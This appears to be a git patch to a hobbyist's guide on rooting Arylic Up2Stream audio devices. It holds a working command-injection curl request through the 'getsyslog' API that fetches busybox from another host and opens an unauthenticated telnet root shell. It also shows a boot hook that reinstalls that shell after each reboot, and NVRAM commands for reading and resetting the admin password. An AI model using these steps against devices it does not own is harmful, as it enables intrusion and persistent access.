From 013e46ca440409d1fdcdf7caaf8de8e37cb7d7ec Mon Sep 17 00:00:00 2001 From: Jan Wachsmuth Date: Tue, 2 Jan 2024 23:51:50 +0100 Subject: [PATCH] updated content --- README.md | 3 ++ TELNETD.md | 13 ++---- boot-process.md | 47 ++++++++++++++++++++ persistant-hook.md | 108 +++++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 162 insertions(+), 9 deletions(-) create mode 100644 persistant-hook.md diff --git a/README.md b/README.md index 813353a..ed79fa3 100644 --- a/README.md +++ b/README.md @@ -29,3 +29,6 @@ Information about the boot process, file systems including environment (NVRAM). ## Downgrade Firmware The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware. [Downgrade Firmware](/Downgrade.md) + +## Install Persistant Hook +When the device reboots, any changes in ramfs are lost, however there is a way to install a script or command so that it survives a reboot. [Install Persistant Hook](/persistant-hook.md) \ No newline at end of file diff --git a/TELNETD.md b/TELNETD.md index 1c61e99..b836b0b 100644 --- a/TELNETD.md +++ b/TELNETD.md @@ -5,14 +5,15 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo The following code snippets are using the IP address 10.1.1.58 for my Arylic Up2Stream device and 10.1.1.22 for a web server running on my local MacMini. ``` -curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash;" +curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+555+/tmp/bin/busybox;ln+-s/tmp/bin/busybox+/tmp/bin/telnetd;/tmp/bin/telnetd+telnetd+-l/bin/ash;" ``` The command above is executing the following commands on the device in addition to the "getsyslog" request: ``` mkdir /tmp/bin wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q; -chmod 777 /tmp/bin/busybox; -/tmp/bin/busybox telnetd -l/bin/ash; +chmod 555 /tmp/bin/busybox; +ln -s /tmp/bin/busybox /tmp/bin/telnetd; +/tmp/bin/telnetd telnetd -l/bin/ash; ``` > **Note:** > Don't forget to add a ";" at the end inside the quotes. Replace all spaces with "+". @@ -20,9 +21,3 @@ chmod 777 /tmp/bin/busybox; The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information. On my web server (10.1.1.22) I've created subdirectory ***/a31/bin*** and have copied the busybox binary to that directory - -You may also redirect output and error output for telnetd: -``` -curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;" -``` - diff --git a/boot-process.md b/boot-process.md index 564c266..4d4c621 100644 --- a/boot-process.md +++ b/boot-process.md @@ -380,6 +380,53 @@ ApCliChannel=6 # a similar output will provide ralink_init show 2860 ``` +To read a specific variable from NVRAM or modify its value use these commands: +``` +nvram_get 2860 HostName +nvram_get 2860 lan_ipaddr +nvram_get 2860 lan_netmask +# displays password admin and sets a new one +nvram_get 2860 Password +nvram_set Password newpassword +``` +The commands are located here: +``` +cd /bin +ls l +... +-rwxrwxr-x 1 1000 1000 33220 ralink_init +lrwxrwxrwx 1 1000 1000 11 nvram_set -> ralink_init +lrwxrwxrwx 1 1000 1000 11 nvram_get -> ralink_init +-rwxrwxr-x 1 1000 1000 7800 nvram_daemon +... +``` +I found a documentation for these commands: +``` +Usage: +a. get: nvram_get [<2860/rtdev>] +b. set: nvram_set [<2860/rtdev>] +c. init: ralink_init [] [] + +: + rt2860_nvram_show (display rt2860 values in nvram) + rtdev_nvram_show (display rtdev values in nvram) + show (display values in nvram for ) + gen (generate config file from nvram for - does not work) + renew (replace nvram values for with ) + clear (??? clear all entries in nvram for - found in a different documentation) +: + 2860 - rt2860 station or the first Wi-Fi interface + rtdev - intelligent nic or the second Wi-Fi interface (not available for Linkplay A31) +: File name for renew command + +Example: +a. nvram_get 2860 SSID /* get the SSID */ +b. nvram_set 2860 SSID ralink /* set the SSID to ralink */ +c. ralink_init gen 2860 /* generate the RT2860 .dat file from NVRAM */ +d. ralink_init show 2860 /* display the INIC configurations in NVRAM */ +e. ralink_init renew 2860 ra.dat /* set NVRAM values for RT2860 platform according to ra.dat file */ +f. nvram_daemon & /* start the nvram_daemon */ +``` \ No newline at end of file diff --git a/persistant-hook.md b/persistant-hook.md new file mode 100644 index 0000000..e5acded --- /dev/null +++ b/persistant-hook.md @@ -0,0 +1,108 @@ +# Install Persistant Hook +When the device reboots, any changes in ramfs are lost, but the device is using flash with squashfs and jffs2 file systems. I have not discovered how to modfiy and upload an image to squashfs, but with jffs2 there is a way to install a hook. + +Below is an output of mount command (including modification of /etc_ro/web/cgi-bin directory, but that's not required to install a hook) and ***cat /proc/mtd*** output: +``` +# mount +rootfs on / type rootfs (rw) +/dev/root on / type squashfs (ro,relatime) +proc on /proc type proc (rw,relatime) +none on /var type ramfs (rw,relatime) +none on /etc type ramfs (rw,relatime) +none on /tmp type ramfs (rw,relatime) +none on /media type ramfs (rw,relatime) +none on /sys type sysfs (rw,relatime) +none on /dev/pts type devpts (rw,relatime,mode=600) +mdev on /dev type ramfs (rw,relatime) +devpts on /dev/pts type devpts (rw,relatime,mode=600) +mdev on /dev type ramfs (rw,relatime) +devpts on /dev/pts type devpts (rw,relatime,mode=600) +/dev/mtdblock8 on /mnt type jffs2 (rw,relatime) +/dev/mtdblock9 on /vendor type jffs2 (rw,relatime) +none on /etc_ro/web/cgi-bin type ramfs (rw,relatime) + +# cat /proc/mtd +dev: size erasesize name +mtd0: 01000000 00010000 "ALL" +mtd1: 00030000 00010000 "Bootloader" +mtd2: 00010000 00010000 "Config" +mtd3: 00010000 00010000 "Factory" +mtd4: 00200000 00010000 "bkKernel" +mtd5: 001df508 00010000 "Kernel" +mtd6: 00950af8 00010000 "RootFS" +mtd7: 00b30000 00010000 "Kernel_RootFS" +mtd8: 00080000 00010000 "user" +mtd9: 00200000 00010000 "user2" +# +``` +The mtd9 device named "user2" is not erased at a reboot, because it contains play lists. It is mounted as /vendor and a hook can be installed in ***/vendor/user*** directory as described below. On the Up2Stream Pro device that I own that directory was already present and a script called ***user.sh*** was located in that directory. + +> **Note:** +> Neither that directory nor the **user.sh*** script were installed on my Up2Stream Amp device by default. Both devices have the same software version 4.2.8020 from 2020/02/20 (20th of Feb 2020) and were downgraded from v4.6.415145, release date 2022/04/27. + +Here's the file from the device where the script was already present (used to start a daemon called ***socket***): +``` +# cat user.sh +#!/bin/sh + +echo "runing custom's app socket.............." +sleep 5 + +chmod 777 /vendor/user/socket + +sn=`ps -ef | grep /vendor/user/socket | grep -v grep |wc -l` +echo $sn + +if [ $sn -eq 0 ]; then + /vendor/user/socket & +fi + +# ######### additional code to install telnetd and more ############# +# get telnetd from full version of busybox and start in background +mkdir /tmp/bin +wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q +chmod 555 /tmp/bin/busybox +ln -s /tmp/bin/busybox /tmp/bin/telnetd +sn=`ps | grep busybox | wc -l` +if [ $sn -eq 1 ]; then + killall busybox +fi +sn=`ps | grep telnetd | wc -l` +if [ $sn -eq 1 ]; then + killall telnetd +fi +/tmp/bin/telnetd telnetd -l/bin/ash & + +# shut down WiFi +ifconfig apcli0 down +ifconfig ra0 down +sleep 60 +ifconfig apcli0 down +echo "WiFi disabled!" + +# Uncomment to disable sleep after 15 minutes +#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done & +``` +For testing purpose, you may ***reboot*** and ***telnet*** to the device afterwards. + +Here's the file from the device where the script was NOT present: +``` +mkdir /vendor/user +cat <<\EOF > /vendor/user/user.sh +#!/bin/sh +# get telnetd from full version of busybox and start in background +wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q +chmod 777 /tmp/bin/busybox +/tmp/bin/busybox telnetd -l/bin/ash >/tmp/web/busybox.out 2>/tmp/web/busybox.err & +# shut down WiFi +ifconfig ra0 down +ifconfig apcli0 down +# Uncomment to disable sleep after 15 minutes +#while true; do sleep 60; echo 'AXX+MUT+000' >/dev/ttyS0; done & +EOF +chmod 755 /vendor/user/user.sh +cd /vendor/user +ls -l +``` +So far, the device fetches the full version of busybook after each reboot. With ***df*** command you can verify the free space on each of the file systems. +